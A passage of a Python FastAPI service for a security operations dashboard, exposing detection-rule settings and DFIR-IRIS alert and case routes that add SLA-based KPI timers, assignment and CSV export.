  2187. usecase_id: str | None = None,
  2188. ) -> ApiResponse:
  2189. rows = repo.list_c_detection_events(limit=limit, offset=offset, usecase_id=usecase_id)
  2190. return ApiResponse(data={"items": rows, "limit": max(1, limit), "offset": max(0, offset), "usecase_id": usecase_id})
  2191. @app.get(
  2192. "/monitor/c-detections/state",
  2193. response_model=ApiResponse,
  2194. dependencies=[Depends(require_internal_api_key)],
  2195. summary="C detection state",
  2196. description="Return Appendix C detection settings and last evaluation runtime state.",
  2197. )
  2198. async def monitor_c_detections_state() -> ApiResponse:
  2199. return ApiResponse(
  2200. data={
  2201. "enabled": settings.c_detection_enabled,
  2202. "settings": {
  2203. "window_minutes": settings.c_detection_window_minutes,
  2204. "c1_max_travel_speed_kmph": settings.c1_max_travel_speed_kmph,
  2205. "c2_offhours_start_utc": settings.c2_offhours_start_utc,
  2206. "c2_offhours_end_utc": settings.c2_offhours_end_utc,
  2207. "c3_host_spread_threshold": settings.c3_host_spread_threshold,
  2208. "c3_scan_port_threshold": settings.c3_scan_port_threshold,
  2209. "create_iris_ticket": settings.c_detection_create_iris_ticket,
  2210. "ticket_cooldown_seconds": settings.c_detection_ticket_cooldown_seconds,
  2211. },
  2212. "state": getattr(app.state, "c_detection_state", {}),
  2213. }
  2214. )
  2215. # ---------------------------------------------------------------------------
  2216. # KPI Timeout helpers and IRIS alert routes
  2217. # ---------------------------------------------------------------------------
  2218. SLA_SECONDS: dict[str, int] = {"High": 14400, "Medium": 28800, "Low": 86400}
  2219. def compute_kpi(
  2220. created_at: str,
  2221. severity_name: str,
  2222. resolved_at: str | None = None,
  2223. ) -> dict[str, object]:
  2224. sla = SLA_SECONDS.get(severity_name, 28800)
  2225. def _parse(ts: str) -> datetime:
  2226. dt = datetime.fromisoformat(ts.replace("Z", "+00:00"))
  2227. return dt if dt.tzinfo else dt.replace(tzinfo=timezone.utc)
  2228. start = _parse(created_at)
  2229. thresholds = [("S1", "#22c55e", 25), ("S2", "#eab308", 50), ("S3", "#f97316", 75), ("S4", "#ef4444", 100)]
  2230. if resolved_at:
  2231. end = _parse(resolved_at)
  2232. elapsed = max(0, (end - start).total_seconds()) # clamp: close_date can't precede open_date
  2233. elapsed_pct = min(elapsed / sla * 100, 100)
  2234. kpi_pct = max(100 - elapsed_pct, 0)
  2235. segments = [{"label": l, "color": c, "active": elapsed_pct >= t} for l, c, t in thresholds]
  2236. return {
  2237. "kpi_pct": round(kpi_pct, 1),
  2238. "elapsed_pct": round(elapsed_pct, 1),
  2239. "status": "Resolved",
  2240. "segments": segments,
  2241. "resolved": True,
  2242. }
  2243. elapsed = (datetime.now(timezone.utc) - start).total_seconds()
  2244. elapsed_pct = min(elapsed / sla * 100, 100)
  2245. kpi_pct = max(100 - elapsed_pct, 0)
  2246. segments = [{"label": l, "color": c, "active": elapsed_pct >= t} for l, c, t in thresholds]
  2247. if kpi_pct >= 80:
  2248. status = "On Track"
  2249. elif kpi_pct >= 60:
  2250. status = "Watch"
  2251. elif kpi_pct >= 40:
  2252. status = "Warning"
  2253. elif kpi_pct >= 20:
  2254. status = "Urgent"
  2255. elif kpi_pct > 0:
  2256. status = "Critical"
  2257. else:
  2258. status = "Breached"
  2259. return {
  2260. "kpi_pct": round(kpi_pct, 1),
  2261. "elapsed_pct": round(elapsed_pct, 1),
  2262. "status": status,
  2263. "segments": segments,
  2264. "resolved": False,
  2265. }
  2266. def _enrich_alerts_with_kpi(iris_response: dict) -> dict:
  2267. """Inject kpi field into each alert row returned by IRIS.
  2268. IRIS GET /api/v2/alerts returns: { "total": N, "data": [...], ... }
  2269. """
  2270. alerts = iris_response.get("data", [])
  2271. if not isinstance(alerts, list):
  2272. return iris_response
  2273. for alert in alerts:
  2274. created_at = alert.get("alert_creation_time") or ""
  2275. severity = (alert.get("severity") or {}).get("severity_name", "Medium")
  2276. if not created_at:
  2277. continue
  2278. resolved_at: str | None = None
  2279. if alert.get("alert_resolution_status_id") is not None:
  2280. history: dict = alert.get("modification_history") or {}
  2281. if history:
  2282. last_ts = max(history.keys(), key=lambda k: float(k))
  2283. resolved_at = datetime.fromtimestamp(float(last_ts), tz=timezone.utc).isoformat()
  2284. try:
  2285. alert["kpi"] = compute_kpi(created_at, severity, resolved_at)
  2286. except Exception:
  2287. alert["kpi"] = {"kpi_pct": 0, "elapsed_pct": 100, "status": "Breached", "segments": [], "resolved": False}
  2288. return iris_response
  2289. def _enrich_cases_with_kpi(iris_response: dict) -> dict:
  2290. # v2 cases list: { "data": [...], "total": N, ... }
  2291. # Each case uses open_date / close_date / state.state_name / severity_id
  2292. _CASE_SEV: dict[int, str] = {1: "Medium", 4: "Low", 5: "High", 6: "High"} # severity_id → name
  2293. cases = iris_response.get("data") or iris_response.get("items", [])
  2294. if not isinstance(cases, list):
  2295. return iris_response
  2296. for case in cases:
  2297. created_at = case.get("open_date") or ""
  2298. if not created_at:
  2299. continue
  2300. sev_id = case.get("severity_id") or 1
  2301. severity = _CASE_SEV.get(int(sev_id), "Medium")
  2302. resolved_at = None
  2303. close_date = case.get("close_date")
  2304. state_name = ((case.get("state") or {}).get("state_name") or "").lower()
  2305. if close_date:
  2306. resolved_at = close_date
  2307. elif state_name == "closed":
  2308. resolved_at = created_at
  2309. try:
  2310. case["kpi"] = compute_kpi(created_at, severity, resolved_at)
  2311. except Exception:
  2312. case["kpi"] = {"kpi_pct": 0, "elapsed_pct": 100, "status": "Breached", "segments": [], "resolved": False}
  2313. return iris_response
  2314. @app.get(
  2315. "/iris/cases/export-csv",
  2316. summary="Export IRIS cases as CSV",
  2317. description="Download all cases (up to 1000) with KPI as a CSV attachment.",
  2318. )
  2319. async def iris_export_cases_csv() -> StreamingResponse:
  2320. try:
  2321. raw = await iris_adapter.list_cases(limit=1000, offset=0)
  2322. except Exception as exc:
  2323. raise HTTPException(status_code=502, detail=f"IRIS case export failed: {exc}") from exc
  2324. enriched = _enrich_cases_with_kpi(raw)
  2325. cases = enriched.get("data") or enriched.get("items", [])
  2326. _CASE_SEV: dict[int, str] = {1: "Medium", 4: "Low", 5: "High", 6: "High"}
  2327. output = io.StringIO()
  2328. fieldnames = ["case_id", "case_name", "severity", "state", "open_date", "close_date", "kpi_pct", "kpi_status"]
  2329. writer = csv.DictWriter(output, fieldnames=fieldnames, extrasaction="ignore")
  2330. writer.writeheader()
  2331. for case in cases:
  2332. kpi = case.get("kpi", {})
  2333. writer.writerow({
  2334. "case_id": case.get("case_id", ""),
  2335. "case_name": case.get("case_name", ""),
  2336. "severity": _CASE_SEV.get(int(case.get("severity_id") or 1), "Medium"),
  2337. "state": (case.get("state") or {}).get("state_name", ""),
  2338. "open_date": case.get("open_date", ""),
  2339. "close_date": case.get("close_date", ""),
  2340. "kpi_pct": kpi.get("kpi_pct", ""),
  2341. "kpi_status": kpi.get("status", ""),
  2342. })
  2343. output.seek(0)
  2344. return StreamingResponse(
  2345. iter([output.getvalue()]),
  2346. media_type="text/csv",
  2347. headers={"Content-Disposition": "attachment; filename=iris_cases.csv"},
  2348. )
  2349. @app.get(
  2350. "/iris/cases/{case_id}",
  2351. response_model=ApiResponse,
  2352. summary="Get single IRIS case with KPI",
  2353. description="Fetch one DFIR-IRIS case by ID and annotate with computed KPI data.",
  2354. )
  2355. async def iris_get_case(case_id: int) -> ApiResponse:
  2356. try:
  2357. raw = await iris_adapter.get_case(case_id)
  2358. except Exception as exc:
  2359. raise HTTPException(status_code=502, detail=f"IRIS case fetch failed: {exc}") from exc
  2360. wrapper = {"data": [raw]}
  2361. enriched = _enrich_cases_with_kpi(wrapper)
  2362. case_out = enriched["data"][0] if enriched.get("data") else raw
  2363. return ApiResponse(data={"case": case_out})
  2364. @app.get(
  2365. "/iris/cases",
  2366. response_model=ApiResponse,
  2367. summary="List IRIS cases with KPI",
  2368. description="Fetch cases from DFIR-IRIS and annotate each with computed KPI data.",
  2369. )
  2370. async def iris_list_cases(
  2371. page: int = 1,
  2372. per_page: int = 20,
  2373. sort_by: str = "case_id",
  2374. sort_dir: str = "desc",
  2375. filter_name: str | None = None,
  2376. ) -> ApiResponse:
  2377. # adapter maps (limit, offset) → (per_page, page) for IRIS v2
  2378. offset = (page - 1) * per_page
  2379. try:
  2380. raw = await iris_adapter.list_cases(limit=per_page, offset=offset)
  2381. except Exception as exc:
  2382. raise HTTPException(status_code=502, detail=f"IRIS case list failed: {exc}") from exc
  2383. enriched = _enrich_cases_with_kpi(raw)
  2384. items = enriched.get("data") or enriched.get("items", [])
  2385. total = enriched.get("total", len(items))
  2386. last_page = enriched.get("last_page", max(1, -(-total // per_page)))
  2387. if filter_name:
  2388. items = [c for c in items if filter_name.lower() in (c.get("case_name") or "").lower()]
  2389. reverse = sort_dir == "desc"
  2390. items.sort(key=lambda c: c.get(sort_by) or 0, reverse=reverse)
  2391. return ApiResponse(data={"cases": {
  2392. "data": items,
  2393. "total": total,
  2394. "current_page": page,
  2395. "last_page": last_page,
  2396. }})
  2397. @app.post(
  2398. "/iris/alerts",
  2399. response_model=ApiResponse,
  2400. summary="Create IRIS alert",
  2401. description="Create a new alert in DFIR-IRIS via /api/v2/alerts.",
  2402. )
  2403. async def iris_create_alert(payload: IrisAlertCreateRequest) -> ApiResponse:
  2404. alert_payload: dict[str, Any] = {
  2405. "alert_title": payload.title,
  2406. "alert_description": payload.description,
  2407. "alert_severity_id": payload.severity_id,
  2408. "alert_status_id": payload.status_id,
  2409. "alert_source": payload.source,
  2410. "alert_customer_id": payload.customer_id or settings.iris_default_customer_id,
  2411. "alert_source_event_time": datetime.now(timezone.utc).isoformat(),
  2412. }
  2413. if payload.source_ref:
  2414. alert_payload["alert_source_ref"] = payload.source_ref
  2415. if payload.payload:
  2416. alert_payload.update(payload.payload)
  2417. try:
  2418. result = await iris_adapter.create_alert(alert_payload)
  2419. except Exception as exc:
  2420. raise HTTPException(status_code=502, detail=f"IRIS alert create failed: {exc}") from exc
  2421. return ApiResponse(data={"alert": result})
  2422. @app.get(
  2423. "/iris/alerts",
  2424. response_model=ApiResponse,
  2425. summary="List IRIS alerts with KPI Timeout",
  2426. description="Fetch alerts from DFIR-IRIS and annotate each row with computed KPI Timeout data.",
  2427. )
  2428. async def iris_list_alerts(
  2429. page: int = 1,
  2430. per_page: int = 20,
  2431. sort_by: str = "alert_id",
  2432. sort_dir: str = "desc",
  2433. filter_title: str | None = None,
  2434. filter_owner_id: int | None = None,
  2435. ) -> ApiResponse:
  2436. try:
  2437. raw = await iris_adapter.list_alerts(
  2438. page=page,
  2439. per_page=per_page,
  2440. sort_by=sort_by,
  2441. sort_dir=sort_dir,
  2442. filter_title=filter_title,
  2443. filter_owner_id=filter_owner_id,
  2444. )
  2445. enriched = _enrich_alerts_with_kpi(raw)
  2446. return ApiResponse(data={
  2447. "alerts": {
  2448. "data": enriched.get("data", []),
  2449. "total": enriched.get("total", 0),
  2450. "current_page": enriched.get("current_page", page),
  2451. "last_page": enriched.get("last_page", 1),
  2452. }
  2453. })
  2454. except Exception as exc:
  2455. raise HTTPException(status_code=502, detail=f"IRIS alert list failed: {exc}") from exc
  2456. @app.get(
  2457. "/iris/alerts/export-csv",
  2458. summary="Export IRIS alerts as CSV",
  2459. description="Download all matching alerts (up to 1000) as a CSV attachment.",
  2460. )
  2461. async def iris_export_alerts_csv(
  2462. sort_by: str = "alert_id",
  2463. sort_dir: str = "desc",
  2464. filter_title: str | None = None,
  2465. filter_owner_id: int | None = None,
  2466. ) -> StreamingResponse:
  2467. try:
  2468. raw = await iris_adapter.list_alerts(
  2469. page=1,
  2470. per_page=1000,
  2471. sort_by=sort_by,
  2472. sort_dir=sort_dir,
  2473. filter_title=filter_title,
  2474. filter_owner_id=filter_owner_id,
  2475. )
  2476. except Exception as exc:
  2477. raise HTTPException(status_code=502, detail=f"IRIS alert export failed: {exc}") from exc
  2478. enriched = _enrich_alerts_with_kpi(raw)
  2479. alerts = enriched.get("data", [])
  2480. output = io.StringIO()
  2481. fieldnames = [
  2482. "alert_id", "alert_title", "alert_severity", "alert_status",
  2483. "alert_creation_time", "alert_source_event_time", "alert_owner",
  2484. "kpi_pct", "kpi_status",
  2485. ]
  2486. writer = csv.DictWriter(output, fieldnames=fieldnames, extrasaction="ignore")
  2487. writer.writeheader()
  2488. for alert in alerts:
  2489. kpi = alert.get("kpi", {})
  2490. severity_name = (alert.get("severity") or {}).get("severity_name", "")
  2491. writer.writerow({
  2492. "alert_id": alert.get("alert_id", ""),
  2493. "alert_title": alert.get("alert_title", ""),
  2494. "alert_severity": severity_name,
  2495. "alert_status": (alert.get("status") or {}).get("status_name", ""),
  2496. "alert_creation_time": alert.get("alert_creation_time", ""),
  2497. "alert_source_event_time": alert.get("alert_source_event_time", ""),
  2498. "alert_owner": (alert.get("owner") or {}).get("user_name", ""),
  2499. "kpi_pct": kpi.get("kpi_pct", ""),
  2500. "kpi_status": kpi.get("status", ""),
  2501. })
  2502. output.seek(0)
  2503. return StreamingResponse(
  2504. iter([output.getvalue()]),
  2505. media_type="text/csv",
  2506. headers={"Content-Disposition": "attachment; filename=iris_alerts.csv"},
  2507. )
  2508. @app.get(
  2509. "/iris/alerts/{alert_id}",
  2510. response_model=ApiResponse,
  2511. summary="Get single IRIS alert with KPI",
  2512. description="Fetch one DFIR-IRIS alert by ID and annotate with computed KPI data.",
  2513. )
  2514. async def iris_get_alert(alert_id: int) -> ApiResponse:
  2515. try:
  2516. raw = await iris_adapter.get_alert(alert_id)
  2517. except Exception as exc:
  2518. raise HTTPException(status_code=502, detail=f"IRIS alert fetch failed: {exc}") from exc
  2519. # Wrap in list-shaped dict so _enrich_alerts_with_kpi can process it
  2520. alert = raw if isinstance(raw, dict) else {}
  2521. wrapper = {"data": [alert]}
  2522. enriched = _enrich_alerts_with_kpi(wrapper)
  2523. alert_out = enriched["data"][0] if enriched.get("data") else alert
  2524. return ApiResponse(data={"alert": alert_out})
  2525. @app.post(
  2526. "/iris/alerts/{alert_id}/assign",
  2527. response_model=ApiResponse,
  2528. summary="Assign IRIS alert to owner",
  2529. description="Update the owner of a DFIR-IRIS alert.",
  2530. )
  2531. async def iris_assign_alert(alert_id: int, body: dict) -> ApiResponse:
  2532. owner_id = body.get("owner_id")
  2533. if not isinstance(owner_id, int):
  2534. raise HTTPException(status_code=422, detail="owner_id must be an integer")
  2535. try:
  2536. result = await iris_adapter.assign_alert(alert_id=alert_id, owner_id=owner_id)
  2537. return ApiResponse(data=result)
  2538. except Exception as exc:
  2539. raise HTTPException(status_code=502, detail=f"IRIS alert assign failed: {exc}") from exc